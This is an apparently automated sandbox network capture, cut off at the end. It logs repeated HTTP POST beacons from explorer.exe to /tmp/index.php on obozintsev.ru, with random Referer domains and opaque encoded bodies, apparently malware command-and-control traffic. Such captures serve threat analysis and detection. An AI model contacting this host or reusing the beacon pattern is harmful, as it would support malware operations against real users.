                                                                                                                        Nov 30, 2024 11:13:47.730003119 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://xgfnddjygdt.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 191
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:47.730045080 CET191OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2e 6b 2c 90 f5 76 0b 75 47 1c cb e1
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[.k,vuGu$@b<@`qtbHvF=q;3A8 S+N[EGV8wMrl
                                                                                                                        Nov 30, 2024 11:13:49.522645950 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:49 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        40192.168.2.449890189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:49.662631989 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ciuapvhjnqxsxxwr.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 177
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:49.662646055 CET177OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2f 6b 2c 90 f5 76 0b 75 5f 56 dc ec
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[/k,vu_Va;Nl3k4V$~VH+_4CBH^x8DOIG>?`9dMQ
                                                                                                                        Nov 30, 2024 11:13:51.422012091 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:51 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        41192.168.2.449896189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:51.558331013 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://egomlfgoxoteaymh.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 305
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:51.558353901 CET305OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2c 6b 2c 90 f5 76 0b 75 49 30 c5 f7
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[,k,vuI0MWC}VaXB?l>b0u]h,_ImAXQ RCqI'"OgK:dSU=HD`x3PZ_.1~
                                                                                                                        Nov 30, 2024 11:13:53.395775080 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:53 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        42192.168.2.449902189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:53.544500113 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ewsvhrknjfqh.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 164
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:53.544539928 CET164OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2d 6b 2c 90 f5 76 0b 75 40 25 b8 ee
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[-k,vu@%~1|~?^GDDU9#1c].Q[H B0E
                                                                                                                        Nov 30, 2024 11:13:55.339034081 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:55 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        43192.168.2.449908189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:55.469620943 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://uqjegtiiabqrm.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 228
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:55.469635963 CET228OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 22 6b 2c 90 f5 76 0b 75 54 42 de 93
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -["k,vuTBcvEJs)L[x2MJ0_E#RW1_HBa}V;!}m2i1iV?6gZU=9;uXc7k
                                                                                                                        Nov 30, 2024 11:13:57.270198107 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:56 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        44192.168.2.449912189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:57.566004038 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://mdwlauviipmapdo.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 203
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:57.566135883 CET203OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 23 6b 2c 90 f5 76 0b 75 64 3e be bf
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[#k,vud>:Pc\$7Q&ns&YZt`x1U=t0T/?C!=RE[!2eT6
                                                                                                                        Nov 30, 2024 11:13:59.350991964 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:59 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        45192.168.2.449915189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:59.501769066 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://pjedtjbwdoay.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 169
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:59.501805067 CET169OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 20 6b 2c 90 f5 76 0b 75 32 2e d0 a2
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[ k,vu2.a?|R}e+o::>wEY6@ag>J#4\'V]C}%D~70
                                                                                                                        Nov 30, 2024 11:14:01.340970039 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:01 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        46192.168.2.449921189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:14:01.467909098 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://buqwtxgqsqkupxr.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 358
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:14:01.467921019 CET358OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 21 6b 2c 90 f5 76 0b 75 3b 45 b3 86
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[!k,vu;E!Y|P2.#9i:YCod~VJ=h(UC'#WxTxA{6[M8M0tD++ANv+5#6e
                                                                                                                        Nov 30, 2024 11:14:03.218429089 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:02 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        47192.168.2.449927189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:14:03.346157074 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://lxgihqdoncikbgg.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 215
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:14:03.346194983 CET215OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 26 6b 2c 90 f5 76 0b 75 7b 36 fa 8f
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[&k,vu{6uTCVP%,b.Y?!\O:7+cNXAOaQ4a'Ko{l=OFCy
                                                                                                                        Nov 30, 2024 11:14:05.094419003 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:04 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        48192.168.2.449932189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:14:05.221851110 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://pktfnvaxqpxmxps.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 232
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:14:05.221868992 CET232OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 27 6b 2c 90 f5 76 0b 75 71 2f d8 ec
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -['k,vuq/g [j]S+sZHo^wrzF$Tz>7n]8^G5$@V.^&+3B9T8zr H
                                                                                                                        Nov 30, 2024 11:14:07.246759892 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:14:06 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
